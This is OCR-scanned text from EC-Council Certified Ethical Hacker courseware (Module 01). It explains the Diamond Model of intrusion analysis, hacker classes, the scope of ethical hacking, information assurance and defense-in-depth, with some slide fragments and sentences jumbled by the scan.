Describe an intrusion chain of events based on the technique used from start to finish with a common reference.
=
Identify commonalities between adversary tradecraft, as well as distinguishing characteristics.
=
Connect mitigations, weaknesses, and adversaries.
Module 01 Page 31
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Diamond Model of Intrusion Analysis
CEH
2 The Diamond Model offers a frameworkfor identifying the clustersof events thatare correlated on any of the systems in an organization Q
Itcan control the vital atomicelement
occurring in any intrusion activity, which is referred to as the Diamond event
Using this model, efficient mitigation approaches can be developed, and analyticefficiency can be increased Adversary
Victim |
Capability
|
Meta Features of Diamond Model
Anopponent “who” was behind theattack
{| Thetarget thathas been exploited or | “where” the attack was performed
|
s
| The attack strategies or “how” the attack |
was performed
Infrastructure | “What” the adversary used to reach the | 1 victim
Deployedvia
*
|
Diamond Model of Intrusion Analysis The Diamond Model, developed by expert analysts, introduces state-of-the-art technology for intrusion analysis. This model offers a framework and a set of procedures for recognizing clusters of events that are correlated on any of the systems in an organization. The model determines the vital atomic element that occurs in any intrusion activity and is referred to as the Diamond event. Analysts can identify the events and connect them as activity threads for obtaining information regarding how and what transpired during an attack. Analysts can also easily identify whether any data are required by examining the missing features. It also offers a method or route map for analyzing incidents related to any malicious activity and predict the possibility of an attack and its origin. With the Diamond Model, more advanced and efficient mitigation approaches can be developed, and analytic efficiency can be increased. This also results in cost savings for the defender and rising cost for the adversary. The Diamond event consists of four basic features: adversary, capability, infrastructure, and victim. This model is named so because when all the features are arranged according to the relationship between them, it forms as a diamondshaped structure. Although it appears to be a simple approach, it is rather complex and requires high expertise and skill to traceroute the flow of attack.
Module 01 Page 32
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Introduction to Ethical Hacking
= Figure 1.5: Meta features of the Diamond Model
The following are the essential features of the Diamond
event
in the Diamond
Model
of
Intrusion Analysis.
Adversary: An adversary often refers to an opponent or hacker responsible for the attack event. An adversary takes advantage of a capability against the victim to perform a malicious activity for financial benefit or to damage the reputation of the victim. An adversary can be individuals such as insiders or a competitor organization. Adversaries can use many techniques to gain information such as email addresses and network assets and attempt to attack any applications used in smartphones to gain sensitive information. Victim: The victim is the target that has been exploited or the environment where the attack was performed. The adversary exploits the vulnerabilities or security loopholes in the victim’s infrastructure by using their resources. The victim can be any person, organization, institution, or even network information such as IP addresses, domain names, email addresses, and sensitive personal information of an individual. Capability: Capability refers to all the strategies, methods, and procedures associated with an attack. It can also be a malware or tool used by an adversary against the target. Capability includes simple and complex attack techniques such as brute forcing and ransomware attacks.
Infrastructure: Infrastructure refers to the hardware or software used in the network by the target that has a connection with the adversary. It refers to “what” the adversary has used to reach the victim. Consider an organization having an email server in which all the data regarding employee email IDs and other personal details are stored. The adversary can use the server as infrastructure to perform any type of attack by targeting a single employee. Exploiting infrastructure leads to data leakage and data exfiltration. Additional Event Meta-Features In the Diamond Model, an event contains some of the basic meta-features that provide additional information such as the time and source of the event. These meta-features help in linking related events, making it easier and faster for analysts to trace an attack.
Module 01 Page 33
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
The following are the features that help in connecting related events. =
Timestamp: This feature can reveal the time and date of an event. It is important as it can indicate the beginning and end of the event. It also helps in analysis and determining the periodicity of the event.
=
Phase: The phase helps in determining the progress of an attack or any malicious activity. The different phases of an attack include the phases used in the cyber kill chain framework: reconnaissance, weaponization, delivery, exploitation etc.
=
Result: The result is the outcome of any event. For example, the result of an attack can be success, failure, or unknown. It can also be segregated using security fundamentals such as confidentiality(C) compromised, integrity(1) compromised, and availability(A) compromised. CIA Compromised.
=
Direction: This feature refers to the direction of the attack. For instance, the direction can indicate how the adversary was routed to the victim. This feature can be immensely helpful when describing network-based and host-based events. The possible values for this feature include victim to infrastructure, adversary to infrastructure, infrastructure to infrastructure, and bidirectional.
=
Methodology: The methodology refers to any technique that is used by the adversary to perform an attack. This feature allows the analyst to define the overall class of action performed. Some attack techniques are spear-phishing emails, distributed denial-ofservice (DDoS) attacks, content delivery attacks, and drive-by-compromise.
=
Resource: Resource feature entails the use of external resources like tools or technology used to perform the attack. It includes hardware, software, access, knowledge, data etc.
Extended Diamond Model The extended Diamond Model also includes necessary features such as socio-political metafeatures to determine the relationship between the adversary and victim as well as technology meta-features for infrastructure and capabilities. Adversary
Social-Political
Capability
Infrastructure
Technology
Victim Figure 1.6: Extended Diamond Model of Intrusion Analysis
Module 01 Page 34
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
=
Socio-political meta-feature: The socio-political meta-feature describes the relationship between the adversary and victim. This feature is used to determine the goal or motivation of the attacker; common motivations include financial benefit, corporate espionage, and hacktivism.
=
Technology meta-feature: The technology meta-feature describes the relationship between the infrastructure and capability. This meta-feature describes how technology can enable both infrastructure and capability for communication and operation. It can also be used to analyze the technology used in an organization to identify any malicious activity.
Module 01 Page 35
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#03: Explain Hacking Concepts and Different Hacker Classes
y Prohibited.
Hacking Concepts This section deals with basic concepts of hacking: what is hacking, who is a hacker, and hacker classes.
Module 01 Page 36
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
C'EH
What is Hacking?
@
Hacking refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to a system’s resources
@
Itinvolves modifying system or application features to achieve a goal outside of the creator’s original purpose
‘@
A? -
Hacking can be used to steal and redistribute intellectual property, leading tobusiness
loss
What is Hacking? Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves a modifying system or application features to achieve a goal outside its creator’s original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss. Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, for thrill, intellectual challenge, curiosity, experiment, knowledge, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.
Module 01 Page 37
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Who is a Hacker? 01 An intelligent individual with
excellent computer skills who can create and explore computer software and hardware
CE H 02
03
For some hackers, hacking is a
hobby to see how many computers or networks they can compromise 7G
Oo
Some hackers’ intentions can
either be to gain knowledge or to probe and do illegal things
cam
Some hack with malicious intent such as to steal business data, credit card information, social security numbers, email passwords, and other sensitive data
Who is a Hacker? A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer’s software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.
Module 01 Page 38
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Hacker Classes
@
@
Gray Hats
Black Hats
White Hats
Individuals with extraordinary computing skills; they resortto malicious or destructive activities and are also known as crackers
Individuals who use their professed hacking skills for defensive purposes and are also known as security analysts. They have permission from the system owner
@
offensively and defensively at various times
@
@
Cyber Terrorists
An unskilled hacker who compromises a system by running scripts, tools, and software that were developed by real hackers
Individuals who aim to bring down the critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment
Individuals who work both
@
Script Kiddies
Suicide Hackers
State-Sponsored Hackers
Individuals with wide range of skills who are motivated by religious or political beliefs to create fear through the largescale disruption of computer networks
Hacktivist
Individuals employed by the government to penetrate and gain top-secret information from and do damage to the information systems of other governments
Individuals who promote a political agenda by hacking, especially by using hacking to deface or disable website
served. Reproduction is Strictly Prohibited
CEH
Hacker Classes (Cont’d)
@
&
Industrial Spies
Hacker Teams
A consortium of skilled hackers having their own resources and funding. They work together in synergy for researching the state-of-the-art technologies
Insider
Individuals who perform corporate espionage by illegally spying on competitor organizations and focus on stealing information such as blueprints and formulas
12]
Criminal Syndicates
Groups of individuals that are involved in organized, planned, and prolonged criminal activities. They illegally embezzle money by performing sophisticated cyber-attacks
‘Any trusted person who has access to critical assets of an organization. They use privileged access to violate rules or intentionally cause harm to the organization's information system
Organized Hackers Miscreants or hardened criminals who use rented
devices or botnets to perform various cyber-attacks to pilfer money from victims cerved. Reproduction is Strictly Prohibited
Hacker Classes Hackers usually fall into one of the following categories, according to their activities: =
Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers.
Module 01 Page 39
al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking =
Exam 312-50 Certified Ethical Hacker
White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the
system owner. =
Gray Hats: Gray hats are the individuals who work various times. Gray hats might help hackers to find network and, at the same time, help vendors hardware) by checking limitations and making them
=
Suicide Hackers: Suicide hackers are individuals who aim to bring down critical infrastructure for a “cause” and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life for an attack and are thus not concerned with the consequences of their actions.
=
Script Kiddies: Script kiddies are unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity rather than the quality of the attacks that they initiate. They do not have a specific target or goal in performing the attack and simply aim to gain popularity or prove their technical skills.
=
Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks.
=
State-Sponsored Hackers: State-sponsored hackers are skilled individuals having expertise in hacking and are employed by the government to penetrate, gain top-secret information from, and damage the information systems of other government or military organizations. The main aim of these threat actors is to detect vulnerabilities in and exploit a nation’s infrastructure and gather intelligence or sensitive information.
=
Hacktivist: Hacktivism is a form of activism in which hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both online and offline arenas. They promote a political agenda especially by using hacking to deface or disable websites. In some incidents, hacktivists may also obtain and reveal confidential information to the public. Common hacktivist targets include government agencies, financial institutions, multinational corporations, and any other entity that they perceive as a threat. Irrespective of hacktivists’ intentions, the gaining of unauthorized access is a crime.
=
Hacker Teams: A hacker team is a consortium of skilled hackers having their own resources and funding. They work together in synergy for researching state-of-the-art technologies. These threat actors can also detect vulnerabilities, develop advanced tools, and execute attacks with proper planning.
Module 01 Page 40
both offensively and defensively at various vulnerabilities in a system or to improve products (software or more secure.
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
=
Industrial Spies: Industrial spies are individuals who perform corporate espionage by illegally spying on competitor organizations. They focus on stealing critical information such as blueprints, formulas, product designs, and trade secrets. These threat actors use advanced persistent threats (APTs) to penetrate a network and can also stay undetected for years. In some cases, they may use social engineering techniques to steal sensitive information such as development plans and marketing strategies of the target company, which can result in financial loss to that company.
=
Insiders: An insider is any employee (trusted person) who has access to critical assets of an organization. An insider threat involves the use of privileged access to violate rules or intentionally cause harm to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Generally, insider threats arise from disgruntled employees, terminated employees, and undertrained staff members.
=
Criminal Syndicates: Criminal syndicates are groups of individuals or communities that are involved in organized, planned, and prolonged criminal activities. They exploit victims from distinct jurisdictions on the Internet, making them difficult to locate. The main aim of these threat actors is to illegally embezzle money by performing sophisticated cyber-attacks and money-laundering activities.
=
Organized Hackers: Organized hackers are a group of hackers working together in criminal activities. Such groups are well organized in a hierarchical structure consisting of leaders and workers. The group can also have multiple layers of management. These hackers are miscreants or hardened criminals who do not use their own devices; rather, they use rented devices or botnets and crimeware services to perform various cyberattacks to pilfer money from victims and sell their information to the highest bidder. They can also swindle intellectual property, trade secrets, and marketing plans; covertly penetrate the target network; and remain undetected for long periods.
Module 01 Page 41
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#04: Explain Ethical Hacking Concepts and Scope
Copyright © by
Al Rights Reser
Ethical Hacking Concepts An ethical hacker follows processes similar to those of a malicious hacker. The steps to gain and maintain access to a computer system are similar irrespective of the hacker’s intentions. This section provides an overview of ethical hacking, why ethical hacking is necessary, the scope and limitations of ethical hacking, and the skills of an ethical hacker.
Module 01 Page 42
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
What is Ethical Hacking? @ Ethical hacking involves the use of hacking tools, tricks, and techniques to identify vulnerabilities and ensure system security
@ It focuses on simulating the techniques used by attackers to verify the existence of exploitable vulnerabilities in a system’s security
@ Ethical hackers perform security assessments for an organization with the permission of concerned authorities
Conyrieht © by
Lt
oe
E]
RightsReserved, Reproduction is Strictly Prohibited
What is Ethical Hacking? Ethical hacking is the practice of employing computer and network skills in order to assist organizations in testing their network security for possible loopholes and vulnerabilities. White Hats (also known as security analysts or ethical hackers) are the individuals or experts who perform ethical hacking. Nowadays, most organizations (such as private companies, universities, and government organizations) are hiring White Hats to assist them in enhancing their cybersecurity. They perform hacking in ethical ways, with the permission of the network or system owner and without the intention to cause harm. Ethical hackers report all vulnerabilities to the system and network owner for remediation, thereby increasing the security of an organization’s information system. Ethical hacking involves the use of hacking tools, tricks, and techniques typically used by an attacker to verify the existence of exploitable vulnerabilities in system security. Today, the term hacking is closely associated with illegal and unethical activities. There is continuing debate as to whether hacking can be ethical or not, given the fact that unauthorized access to any system is a crime. Consider the following definitions: =
The noun “hacker” refers to a person who systems and stretching their capabilities.
enjoys
learning the details of computer
=
The verb “to hack” describes the rapid development of new programs or the reverse engineering of existing software to make it better or more efficient in new and innovative ways.
=
The terms “cracker” and “attacker” refer to persons who employ their hacking skills for offensive purposes.
Module 01 Page 43
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking =
Exam 312-50 Certified Ethical Hacker
The term “ethical hacker” refers to security professionals who skills for defensive purposes.
employ
their hacking
Most companies employ IT professionals to audit their systems for known vulnerabilities. Although this is a beneficial practice, crackers are usually more interested in using newer, lesser-known vulnerabilities, and so these by-the-numbers system audits do not suffice. A company needs someone who can think like a cracker, keep up with the newest vulnerabilities and exploits, and recognize potential vulnerabilities where others cannot. This is the role of the ethical hacker. Ethical hackers exception that administrators patching those
usually employ the same tools and techniques as hackers, with the important they do not damage the system. They evaluate system security, update the regarding any discovered vulnerabilities, and recommend procedures for vulnerabilities.
The important distinction between ethical hackers and crackers is consent. Crackers attempt to gain unauthorized access to systems, while ethical hackers are always completely open and transparent about what they are doing and how they are doing it. Ethical hacking is, therefore, always legal.
Module 01 Page 44
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Why Ethical Hacking is Necessary To beat a hacker, you need to think like one!
Ethical hacking is necessary as it allows for counter attacks against malicious hackers through anticipating the methods used to break into the system
Reasons why organizations recruit ethical hackers
To prevent hackers from gaining access to the organization’s information systems
To provide adequate preventive measures in order to avoid security breaches
Topotential uncoveras vulnerabilities 9 security risk in systems and explore their
To help safeguard customer data
To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices
To enhance security awareness at all levels in a business
CEH
Why Ethical Hacking is Necessary (Cont’d) Ethical Hackers Try to Answer the Following Questions
@ _ what can an intruder see on the target system? (Reconnaissance and Scanning phases) ©
what can an intruder do with that information? (Gaining Access and Maintaining Access phases) Does anyone at the target organization notice the intruders’ attempts or successes? (Reconnaissance and Covering Tracks phases)
Are all components of the information systemadequately protected, updated, and patched? How much time, effort, and money are required to obtain adequate protection? Are the information security measures in compliance with legal and industry standards? Al Rights Reserved. Reproduction i
Why Ethical Hacking is Necessary As technology is growing at a faster pace, so is the growth beat a hacker, it is necessary to think like one!
in the risks associated with it. To
Ethical hacking is necessary as it allows to counter attacks from malicious hackers by anticipating methods used by them to break into a system. Ethical hacking helps to predict various possible vulnerabilities well in advance and rectify them without incurring any kind of
Module 01 Page 45
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
outside attack. As hacking involves creative thinking, vulnerability testing, and security audits alone cannot ensure that the network is secure. To achieve security, organizations must implement a “defense-in-depth” strategy by penetrating their networks to estimate and expose vulnerabilities. Reasons why organizations recruit ethical hackers =
To prevent hackers from gaining access to the organization’s information systems
=
To uncover vulnerabilities in systems and explore their potential as a risk
=
To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices
=
To provide adequate preventive measures in order to avoid security breaches
=
To help safeguard the customer data
=
To enhance security awareness at all levels in a business
An ethical hacker’s evaluation of a client’s information system security seeks to answer three basic questions: 1.
What can an attacker see on the target system? Normal security checks by system administrators will often overlook vulnerabilities. The ethical hacker has to think about what an attacker might see during the reconnaissance and scanning phases of an attack.
2.
What can an intruder do with that information? The ethical hacker must discern the intent and purpose behind attacks to determine appropriate countermeasures. During the gaining-access and maintaining-access phases of an attack, the ethical hacker needs to be one step ahead of the hacker in order to provide adequate protection.
3.
Are the attackers’ attempts being noticed on the target systems? Sometimes attackers will try to breach a system for days, weeks, or even months. Other times they will gain access but will wait before doing anything damaging. Instead, they will take the time to assess the potential use of exposed information. During the reconnaissance and covering tracks phases, the ethical hacker should notice and stop the attack.
After carrying out attacks, hackers may clear their tracks by modifying log files and creating backdoors, or by deploying trojans. Ethical hackers must investigate whether such activities have been recorded and what preventive measures have been taken. This not only provides them with an assessment of the attacker’s proficiency but also gives them insight into the existing security measures of the system being evaluated. The entire process of ethical hacking and subsequent patching of discovered vulnerabilities depends on questions such as: =
What is the organization trying to protect?
=
Against whom or what are they trying to protect it?
Module 01 Page 46
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
=
Are all the components of the information system adequately protected, updated, and patched?
=
How much time, effort, and money is the client willing to invest to gain adequate protection?
=
Do the information security measures comply with industry and legal standards?
Sometimes, in order to save on resources or prevent further discovery, the client might decide to end the evaluation after the first vulnerability is found; therefore, it is important that the ethical hacker and the client work out a suitable framework for investigation beforehand. The client must be convinced of the importance of these security exercises through concise descriptions of what is happening and what is at stake. The ethical hacker must also remember to convey to the client that it is never possible to guard systems completely, but that they can always be improved.
Module 01 Page 47
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
C'EH
Scope and Limitations of Ethical Hacking Scope
Limitations
@ Ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices
@ Unless the businesses already know what they are looking for and why they are hiring an outside vendor to hack systems in the first
@ Itis used to identify risks and highlight remedial actions. It also reduces ICT costs by resolving vulnerabilities
@ Anethical hacker can only help the organization
there would toplace, gain chances from theareexperience
not be much
to better understand its security system; it is up
to the organization to place the right safeguards on the network
Bs
Lela
Scope and Limitations of Ethical Hacking Security experts broadly categorize computer crimes into two categories: crimes facilitated by a computer and those in which the computer is the target.
Ethical hacking is a structured and organized security assessment, usually as part of a penetration test or security audit, and is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices. It is used to identify risks and highlight remedial actions. It is also used to reduce Information and Communications Technology (ICT) costs by resolving vulnerabilities. Ethical hackers determine the scope of the security assessment according to the client’s security concerns. Many ethical hackers are members of a “Tiger Team.” A tiger team works together to perform a full-scale test covering all aspects of the network, as well as physical and system intrusion.
An ethical hacker should know the penalties of unauthorized hacking into a system. No ethical hacking activities associated with a network-penetration test or security audit should begin before receiving a signed legal document giving the ethical hacker express permission to perform the hacking activities from the target organization. Ethical hackers must be judicious with their hacking skills and recognize the consequences of misusing those skills. The ethical hacker must follow certain rules to fulfill their ethical and moral obligations. They must do the following: =
Gain
authorization
from
the
client
and
have
a
signed
contract
giving
the
tester
permission to perform the test.
Module 01 Page 48
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Maintain confidentiality when performing the test and follow a Nondisclosure Agreement (NDA) with the client for the confidential information disclosed during the test. The information gathered might contain sensitive information, and the ethical hacker must not disclose any information about the test or the confidential company data to a third party. Perform the test up to but not beyond the agreed-upon limits. For example, ethical hackers should perform DoS attacks only if they have previously agreed upon this with the client. Loss of revenue, goodwill, and worse consequences could befall an organization whose servers or applications are unavailable to customers because of the testing. The following steps provide a framework for performing a security audit of an organization, which will help in ensuring that the test is organized, efficient, and ethical: Talk to the client and discuss the needs to be addressed during the testing Prepare and sign NDA documents with the client Organize an ethical hacking team and prepare the schedule for testing
Conduct the test Analyze the results of the testing and prepare a report Present the report findings to the client However, there are limitations too. Unless the businesses first know what they are looking and why they are hiring an outside vendor to hack their systems in the first place, chances there would not be much to gain from experience. An ethical hacker, thus, can only help organization to better understand its security system. It is up to the organization to place right safeguards on the network.
Module 01 Page 49
for are the the
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Skills of an Ethical Hacker
Technical Skills
In-depth knowledge of major operating environments such as Windows, Unix, Linux, and Macintosh In-depth knowledge of networking concepts, technologies, and related hardware and software Acomputer expert adept at technical domains
Knowledgeable about security areas and related issues
CE H
2
Non-Technical Skills
© The abilityto learn and adopt new technologies quickly © Strong work ethics and good problem solving and communication skills © Committed to the organization’s security policies © Anawareness of local standards and laws
“High technical” knowledge for launching sophisticated
attacks
Skills of an Ethical Hacker It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills to be a good ethical hacker are discussed below: Technical Skills o
In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh
o
In-depth knowledge of networking concepts, technologies, and related hardware
and software
o
Acomputer expert adept at technical domains
o
The knowledge of security areas and related issues
o
High technical knowledge of how to launch sophisticated attacks
Non-Technical Skills o
The ability to quickly learn and adapt new technologies
o
Astrong work ethic and good problem solving and communication skills
o
Commitment to an organization’s security policies
o
Anawareness of local standards and laws
Module 01 Page 50
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#05: Summarize the Techniques used in Information Security Controls
All RightsReserved. Reproductioni Strictly Prohibited.
Information Security Controls Information security controls prevent the occurrence of unwanted events and reduce risk to the organization’s information assets. The basic security concepts critical to information on the Internet are confidentiality, integrity, and availability; the concepts related to the persons accessing the information are authentication, authorization, and non-repudiation. Information is the greatest asset of an organization. It must be secured using various policies, creating awareness, employing security mechanisms, or by other means. This section deals with Information defense-in-depth, risk management, management, and Al and ML concepts.
Module 01 Page 51
Assurance (IA), continual/adaptive security cyber threat intelligence, threat modeling,
strategy, incident
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Information Assurance (IA)
CE H
@ lA refers to the assurance that the integrity, availability, confidentiality, and authenticity of information and information systems is protected during the usage, processing, storage, and transmission of information @
Some of the processes that help in achieving information assurance include:
e
Developing local policy, process, and guidance
©
creating plans for identified resource requirements
©
vesigning network and user authentication strategies
Applying appropriate information assurance controls
(3)
Identifying network vulnerabilities and threats
Performing certification and accreditation
@
icentifying problem and resource requirements
Providing information assurance training
Information Assurance (IA) IA refers to the assurance of the integrity, availability, confidentiality, and authenticity of information and information systems during the usage, processing, storage, and transmission of information. Security experts accomplish information assurance with the help of physical, technical, and administrative controls. Information Assurance and Information Risk Management (IRM) ensure that only authorized personnel access and use information. This helps in achieving information security and business continuity. Some of the processes that help in achieving information assurance include: =
Developing local policy, process, and guidance in such a way to maintain the information systems at an optimum security level
=
Designing network and user authentication strategy—Designing a secure network ensures the privacy of user records and other information on the network. Implementing an effective user authentication strategy secures the information system’s data
=
Identifying network vulnerabilities and threats—Vulnerability assessments outline the security posture of the network. Performing vulnerability assessments in search of network vulnerabilities and threats help to take the proper measures to overcome them
=
Identifying problems and resource requirements
=
Creating a plan for identified resource requirements
=
Applying appropriate information assurance controls
=
Performing the Certification and Accreditation (C&A) process of information helps to trace vulnerabilities, and implement safety measures to nullify them
Module 01 Page 52
systems
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking =
Exam 312-50 Certified Ethical Hacker
Providing information assurance training to all personnel in federal organizations brings among them an awareness of information technology
Module 01 Page 53
and
private
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Continual/Adaptive Security Strategy
CE H
eanizationsshould adopt adaptive security strategy, which involvesimplementingall the four network security approaches QO The adaptive security strategy consists of four security activities corresponding to each security approach 2
nO,
0)
tose)
Predict
Protect
> Defense-in-depth Security Strategy
> Risk and Vulnerability Assessment
"=
> Attack Surface Analysis
=
> Threat intelligence 8
Protect network
+ Protect data
Respond
Eat
Protect endpoints
Detect
> Incident Response
Continual/Adaptive Security Strategy The adaptive security strategy prescribes that continuous prediction, prevention, detection, and response actions must be taken to ensure comprehensive computer network defense. Protection: This includes a set of prior countermeasures taken towards eliminating all the possible vulnerabilities on the network. It includes security measures such as security policies, physical security, host security, firewall, and IDS. Detection: Detection involves assessing the network for abnormalities such as attacks, damages, unauthorized access attempts, and modifications, and identifying their locations in the network. It includes the regular monitoring of network traffic using network monitoring and packet sniffing tools. Responding: Responding to incidents involves actions such as identifying incidents, finding their root causes, and planning a possible course of actions for addressing them. It includes incident response, investigation, containment, impact mitigation, and eradication steps for addressing the incidents. It also includes deciding whether the incident is an actual security incident or a false positive. Prediction:
Prediction
involves
the
identification
of
potential
attacks,
targets,
and
methods prior to materialization to a viable attack. Prediction includes actions such as conducting risk and vulnerability assessment, performing attack surface analysis, consuming threat intelligence data to predict future threats on the organization.
Module 01 Page 54
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Predict
Protect
> Risk and Vulnerability Assessment > Attack Surface Analysis > Threat Intelligence
> Defense-in-depth Security Strategy = Protect endpoints
Respond
=
Protect network
=
Protect data
Detect
> Incident Response
> Continuous Threat Monitoring
Figure 1.7: Continual/Adaptive Security Strategy
Module 01 Page 55
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Defense-in-Depth
‘@
@
|
Defense-in-depth is a security strategy in which several protection layers are placed throughout an information
B @
system
3
Ithelps to prevent direct attacks against
Z
the system and its data because
P}
a break in one layer only leads the attacker to the next layer
P
a
| 2 | "Pa. 2
In
Alyy,
S
ey te tay Me,
fe,
Ne
“a, &
be,
AB
3 g
33
Nieg,
%,
&
%
&
% % o
Strictly Prohibited
Defense-in-Depth
Defense-in-Depth Layers
Defense-in-depth is a security strategy in which security professionals use several protection layers throughout an information system. This strategy uses the military principle that it is more difficult for an enemy to defeat a complex and multi-layered defense system than to penetrate a single barrier. Defense-in-depth helps to prevent direct attacks against an information system and its data because a break in one layer only leads the attacker to the next layer. If a hacker gains access to a system, defense-in-depth minimizes any adverse impact and gives administrators and engineers time to deploy new or updated countermeasures to prevent a recurrence of the intrusion.
Defense-in-Depth Layers Figure 1.8: Defense in Depth
Module 01 Page 56
